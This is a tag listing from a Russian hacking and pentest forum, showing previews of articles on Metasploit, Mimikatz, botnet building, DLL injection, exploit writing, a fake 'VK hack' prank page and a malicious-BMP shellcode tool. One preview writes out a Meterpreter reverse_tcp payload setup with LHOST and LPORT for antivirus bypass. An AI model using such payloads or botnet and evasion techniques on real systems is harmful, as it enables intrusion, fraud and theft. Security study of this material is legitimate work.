• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

hack

  1. Ondrik8

    сказ о хакнутом "огрызке" или hack Mac OSx

    Приветствую, поведую Вам ознакомительную статью, о не приступном Маке и разрушу одну небылицу о том что "Мак-ось-хэ" не возможно взломать" и надеюсь благодоря этой статье скорость Стива Джобса в его оптекаемом гробу увеличится на несколько оборотов, хотя он там и так как "кура гриль" вертится...
  2. Ondrik8

    Инструменты для WEB-Hack-a + книга

    книга >>>>>> новичкам обязательно к прочтению Test sites SPI Dynamics (live) – http://zero.webappsecurity.com/ Cenzic (live) – http://crackme.cenzic.com/ Watchfire (live) – http://demo.testfire.net/ Acunetix (live) – http://testphp.acunetix.com/...
  3. SooLFaa

    Статья Автоматизируем работу с w3af

    Здрав будь, люд хекерский. Сегодня, поведаю я вам, как можно сделать автоматический пентест средствами w3af api. Напомню, что это достаточно неплохой фаззер. По мере развития этого скрипта буду обновлять этот топик. А пока код автоматический запускает api, сканирует с заданным профилем...
  4. SooLFaa

    Ох уж этот Mimikatz

    Ну что братцы! Снова я приветствую Вас. Сегодня мы поговорим о небольшом в каком - то смысле, но очень мощном постэксплуатационном фреймворке Mimikatz. Cсылочка на вики: gentilkiwi/mimikatz Ссылочка где ещё почитать: Mimikatz Ссылочка на гит: gentilkiwi/mimikatz Ссылочка на метасплоит с...
  5. Vander

    Статья Доступ к хосту используя TELNET

    Привет. В этой статье я хочу показать несколько способов получения доступа к удаленному хосту с помощью протокола telnet. Протокол прикладного уровня TELNET (от англ. TErminaL NETwork) — сетевой протокол для реализации текстового интерфейса по сети. Название telnet получили также клиентские...
  6. SooLFaa

    Meterpreter(Metasploit) - Windows модули

    Здравия желаю, дамы господа. О чём поговорим сегодня? МЕТЕРПРЕТЕР Для тех кто не вкурсе это очень большой шеллкод с кучей возможностей и сегодня мы рассмотрим, что умеет метерпретер для Windows машин. Так же отсылаю Вас в свою тему про метасплоит где Вы познакомитесь с некоторыми общими...
  7. SooLFaa

    Статья Metasploit - несколько заметок

    Моя Статья Форк с Ачата, но так как часто к ней обращаюсь, хочу сюда форкнуть antichat.ru Всем привет. Пришлось позаморачиваться с метасплоитом и решил сделать несколько заметочек. Я не буду в миллионный раз повторять, то, что уже написано на форуме о метасплоите. Что это почитать можно здесь и...
  8. Vander

    SMB Pentest Windows Server 2008

    Всем привет! В этой статье я опишу процедуру тестирования на проникновение целевого хоста под управлением Windows Server 2008. Целью будет получение активной сессии meterpreter, на компьютере тестирующего. В качестве платформы для проведения теста, мною будет использоваться Kali Linux...
  9. SooLFaa

    Статья Создаем ботнет - Часть 2

    Часть 2 Буэнас Диас Эль мучачас. Вы ждали, и Вы дождались. Наконец то вторая часть про ботнетик. В первой части мы создали каркас, я бы сказал заготовку, но она достаточно сырая, толком не рабочая. Сразу оговорюсь на счет того, что я не копирую свой код из рабочего продукта, а пишу новый, для...
  10. Vander

    Статья Hakku Framework

    Привет всем! В этой статье, я хочу познакомить вас с небольшим, простеньким фреймворком для проведения тестов на проникновение, под названием - Hakku Framework Penetration Test Tools. Hakku фреймворк имеет простую структуру, предполагает наличие базовых знаний в работе с командной строкой...
  11. SooLFaa

    Статья Имитация взлома или как обманывают во Вконтакте

    Попросил меня мой хороший товарищ, написать такую программу, которая будет менять вёрстку в браузере на лету, дабы похвастаться перед друзьями сколько много у него денег на счету или обмануть каких - нибудь людей "взломом вк". Казалось бы, "Да чё нам стоит - дом построить", залез в исходный код...
  12. Сергей Попов

    Статья Создание Эксплойта: Переполнение буфера стека

    Переполнение буфера стека происходит, когда программа записывает больше данных для стека, чем было выделено для буфера. Это приводит к перезаписыванию, возможно, важных избыточных данных в стеке и вызывает аварийное завершение или выполнение произвольного кода возможным перезаписыванием...
  13. SooLFaa

    Статья DLL Injection

    Привет господа форумчане. Давненько я не писал, но ничего страшного, скоро решатся пара бытовых проблем и выпуск статей нормализуется по 2 - 3 в неделю. А сегодня, мы поговорим немного не мало о технике DLL Инъекций и рассмотрим пару примеров. Итак что такое DLL Инъекция? Это тип атаки...
  14. Vander

    Статья Тест на проникновение с помощью Exploit Pack

    Привет всем! В этой статье мы займемся тестированием на проникновение с помощью свежего инструмента под названием Exploit Pack. Это можно сказать фреймворк, имеющий довольно подробный и user friendly графический интерфейс. Он не предполагает знание пользователем командной строки. В нем...
  15. SooLFaa

    Статья Создаем свой ботнет

    Часть 1 Часть 2 находится тут Добрый вечер господа. Сегодня я хотел бы поговорить не о взломе в чистом виде. Я думаю пришло время нам с Вами создать собственный БОТНЕТ. Эта тема, является не новой, но я бы хотел обратить внимание на то как именно начать создавать ботнет. Я уже являюсь...
  16. SooLFaa

    Статья AV ByPass с помощью C#

    Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#. Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите. use windows/meterpreter/reverse_tcp Устанавливаем опции set LHOST 192.168.1.237 set LPORT 1338 set EXITFUNC thread И...
  17. SooLFaa

    Поднимаем свой хекерский маленький сервер

    Приветствую Вас господа, сегодня мы поговорим о вечном. А именно как создать маленькую станцию для хека всего за 6000р. Собственно, начнем с основ и разберемся для чего нам это надо: 1) Неудобно каждый раз пускать виртуалку; 2) Меньше нагрузка для поддержки двух систем; 3) Возможность...
  18. Vander

    Статья Pythem – Penetration Testing Framework.

    Всем привет! В этой статье я хочу показать довольно новый инструмент для проведения тестирования на проникновение. Называется он Pythem – Penetration Testing Framework. Framework написан на языке Python, что, позволяет легко кастомизировать его под свои цели. Список изменений в версии: PytheM...
  19. Vander

    Статья DKMC - Dont Kill My Cat (bmp + shell)

    Привет! В этой теме речь пойдет о небольшой утилите, целью которой является создание вредоносного .bmp файла, и генерация шеллкодов. Называется она DKMC – Don’t Kill My Cat. Установим ее с Github: > git clone https://github.com/Mr-Un1k0d3r/DKMC Затем: > сd DKMC > ls –a > сhmod a+x...
  20. C

    Статья THC-Hydra инструкция для чайников

    Hydra нельзя отнести к простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось оседлать hydra, я рекомендую вам посмотреть на программу BruteX. Она автоматизирует процесс подбора, более того, она использует ту же самую hydra, но сама вводит необходимые ключи и не нужно искать...